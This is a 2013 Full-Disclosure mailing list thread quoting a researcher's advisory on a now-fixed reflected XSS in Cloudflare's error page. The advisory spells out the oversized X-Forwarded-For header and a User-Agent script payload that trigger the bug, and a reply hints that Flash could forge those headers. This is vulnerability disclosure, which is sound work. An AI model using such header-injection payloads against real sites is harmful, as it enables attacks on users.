Heard of flash m8?
2013/8/22 <xn...@xnite.org> > ** > > That's a nice trick and all, but I don't see how it's valuable. In order > to trigger the XSS you need to modify your browser headers, therefore any > victim who you are trying to get to a page to execute your XSS would need > to also modify THEIR browser headers. I don't see how this is any thing > more than a neat trick. Sorry. > > > On Thursday 22 August 2013 23:18:03 Glenn Grant wrote: > > Details below of an XSS vulnerability I discovered in Cloudflare (markdown > format) > > > - Glenn | /dev/alias > > * http://blog.devalias.net > > * http://devalias.net > > > ----- > > > **Reference Number:** DAHAX-2013-001 (/dev/alias/hacks 2013-001) > > > **Notification Timeline:** > > > * 10/07/2013, Request# 38713 ( > https://support.cloudflare.com/anonymous_requests/new) > > * 10/07/2013, Vendor looking into issue > > * 16/07/2013, Updated vendor with new details (Length: 101 instead of 72) > > * 16/07/2013, Vendor requested that I test again > > * [No further response from vendor] > > * 01/08/2013, Tested again, vulnerability fixed > > > **Details Published:** 14/08/2013 ( > http://blog.devalias.net/post/58217238426/dahax-2013-001-cloudflare-xss-vulnerability > ) > > > ## What? > > > * Reflected XSS (cross site scripting) attack > > > ## Where's Affected? > > > * Theoretically it seems that any page that uses cloudflare will be > affected. > > - Eg: http://www.cloudflare.com/ > > > ## How? > > > * **To bring up the vulnerable page** > > - Set your X-Forwarded-For header to <del>72+</del> 101+ characters > > - <del>Eg: X-Forwarded-For: > AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEFFFFFFFFFFGGGGGGGGGGHH</del> > > - Eg: <pre>X-Forwarded-For: > AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEFFFFFFFFFFGGGGGGGGGGHHHHHHHHHHIIIIIIIIIIJJJJJJJJJJK</pre> > > - Load a site using cloudflare > > - You should end up on "DNS Points to Prohibited IP" page > > > * **To trigger the XSS** > > - Set your User-Agent string to the XSS attack > > - Eg: <pre>User-Agent: USER-AGENT being tested for > XSS..<script>alert('Vulnerable to XSS via USER-AGENT header [Found by > devalias.net]')</script></pre> > > > * **The whole attack** > > - Ensure your X-Forwarded-For and User-Agent headers are configured as > above > > - Navigate to a page using cloudflare > > - ??? > > - Profit! > > > ## Who? > > > * Discovered by [Glenn '/dev/alias' Grant](http://www.devalias.net/) ( > gl...@devalias.net) > > > ## Responsible Disclosure Notice > > > * Following in the footsteps of Google's vulnerability disclosure > timeline, unless otherwise agreed to beforehand, I reserve the right to > publicly announce the details of any discovered vulnerabilities 7 days post > notification. > > * **Google's Rationale:** "Seven days is an aggressive timeline and may > be too short for some vendors to update their products, but it should be > enough time to publish advice about possible mitigations, such as > temporarily disabling a service, restricting access, or contacting the > vendor for more information. As a result, after 7 days have elapsed without > a patch or advisory, we will support researchers making details available > so that users can take steps to protect themselves. By holding ourselves to > the same standard, we hope to improve both the state of web security and > the coordination of vulnerability management." - [Google]( > http://googleonlinesecurity.blogspot.com.au/2013/05/disclosure-timeline-for-vulnerabilities.html > ) > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
